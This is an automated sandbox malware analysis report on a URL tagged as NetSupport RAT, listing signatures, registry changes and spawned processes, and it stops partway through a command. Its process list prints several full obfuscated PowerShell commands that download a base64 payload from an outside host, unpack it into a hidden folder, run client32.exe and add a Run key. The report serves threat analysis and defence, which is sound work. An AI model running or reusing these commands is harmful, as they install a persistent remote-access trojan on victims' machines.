Malware Analysis Report

2024-10-23 16:16

Sample ID: 240124-zhst2aghdp
Target: http://blawx.com
Tags: netsupport persistence rat
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

Threat Level: Known bad

The file http://blawx.com was found to be: Known bad.

Malicious Activity Summary

netsupport persistence rat

NetSupport

Blocklisted process makes network request

Loads dropped DLL

Executes dropped EXE

Adds Run key to start application

Enumerates physical storage devices

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Script User-Agent

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-01-24 20:43

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-01-24 20:43
Reported: 2024-01-24 20:49
Platform: win10-20231215-en
Max time kernel: 359s
Max time network: 368s

Command Line

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://blawx.com

Signatures

NetSupport

Tags: rat netsupport

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\DIVX911\client32.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\DIVX276\client32.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\DIVX-468\client32.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\DIVX-637\client32.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\DIVX-893\client32.exe | N/A

Adds Run key to start application

Tags: persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000\Software\Microsoft\Windows\CurrentVersion\Run\OFFICE = "C:\\Users\\Admin\\AppData\\Roaming\\DIVX911\\client32.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Enumerates system info in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133506026383362281" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = 00000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 14001f44471a0359723fa74489c55595fe6b30ee0000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Script User-Agent

Description | Indicator | Process | Target
HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Roaming\DIVX911\client32.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\DIVX911\client32.exe | N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1260 wrote to memory of 516 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 3356 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1260 wrote to memory of 4824 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://blawx.com

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffc960f9758,0x7ffc960f9768,0x7ffc960f9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=280 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1964 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2096 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2700 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2816 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3676 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4688 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4780 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4728 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\BILL63351.js"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $rSWtfPHxWB='https://boxtechcompany.com/1/GetData.php?14396';$nHOWpVklImSTUOhYYBi=(New-Object System.Net.WebClient).DownloadString($rSWtfPHxWB);$jcRdbxdvRpQileHzMRdoTehDjWhtoWrPXn=[System.Convert]::FromBase64String($nHOWpVklImSTUOhYYBi);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer -PathType Container)) { New-Item -Path $ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer -ItemType Directory };$p=Join-Path $ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer 'zxc.zip';[System.IO.File]::WriteAllBytes($p,$jcRdbxdvRpQileHzMRdoTehDjWhtoWrPXn);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer -Force; $FSDFSSD.attributes='Hidden';$s=$ooJNwsdKTaQkIXRPjzoXeewezfIAbLdRer+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;

C:\Users\Admin\AppData\Roaming\DIVX911\client32.exe

"C:\Users\Admin\AppData\Roaming\DIVX911\client32.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5128 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5928 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\BILL33615.js"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $rajXRsKbLyahKmgEQDRAysTgndvrH='https://boxtechcompany.com/1/GetData.php?14032';$rjENXRCqoSqtoTmbRXtRUFSynJahYI=(New-Object System.Net.WebClient).DownloadString($rajXRsKbLyahKmgEQDRAysTgndvrH);$mzPXXDkRSgchHwrjafrXw=[System.Convert]::FromBase64String($rjENXRCqoSqtoTmbRXtRUFSynJahYI);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $DqYWXtvBt=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $DqYWXtvBt -PathType Container)) { New-Item -Path $DqYWXtvBt -ItemType Directory };$p=Join-Path $DqYWXtvBt 'zxc.zip';[System.IO.File]::WriteAllBytes($p,$mzPXXDkRSgchHwrjafrXw);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$DqYWXtvBt)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $DqYWXtvBt 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $DqYWXtvBt -Force; $FSDFSSD.attributes='Hidden';$s=$DqYWXtvBt+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;

C:\Users\Admin\AppData\Roaming\DIVX276\client32.exe

"C:\Users\Admin\AppData\Roaming\DIVX276\client32.exe"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\BILL33615.js"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $ERnqGIyavgxZkhhFQQzcsMLi='https://boxtechcompany.com/1/GetData.php?5702';$uiEIBqhhSA=(New-Object System.Net.WebClient).DownloadString($ERnqGIyavgxZkhhFQQzcsMLi);$RBFufKpXmacFNkTysIcaZnCklUwhgv=[System.Convert]::FromBase64String($uiEIBqhhSA);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $qdQZulxrcLjODJPetdoUbikqRuSmW=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $qdQZulxrcLjODJPetdoUbikqRuSmW -PathType Container)) { New-Item -Path $qdQZulxrcLjODJPetdoUbikqRuSmW -ItemType Directory };$p=Join-Path $qdQZulxrcLjODJPetdoUbikqRuSmW 'zxc.zip';[System.IO.File]::WriteAllBytes($p,$RBFufKpXmacFNkTysIcaZnCklUwhgv);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$qdQZulxrcLjODJPetdoUbikqRuSmW)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $qdQZulxrcLjODJPetdoUbikqRuSmW 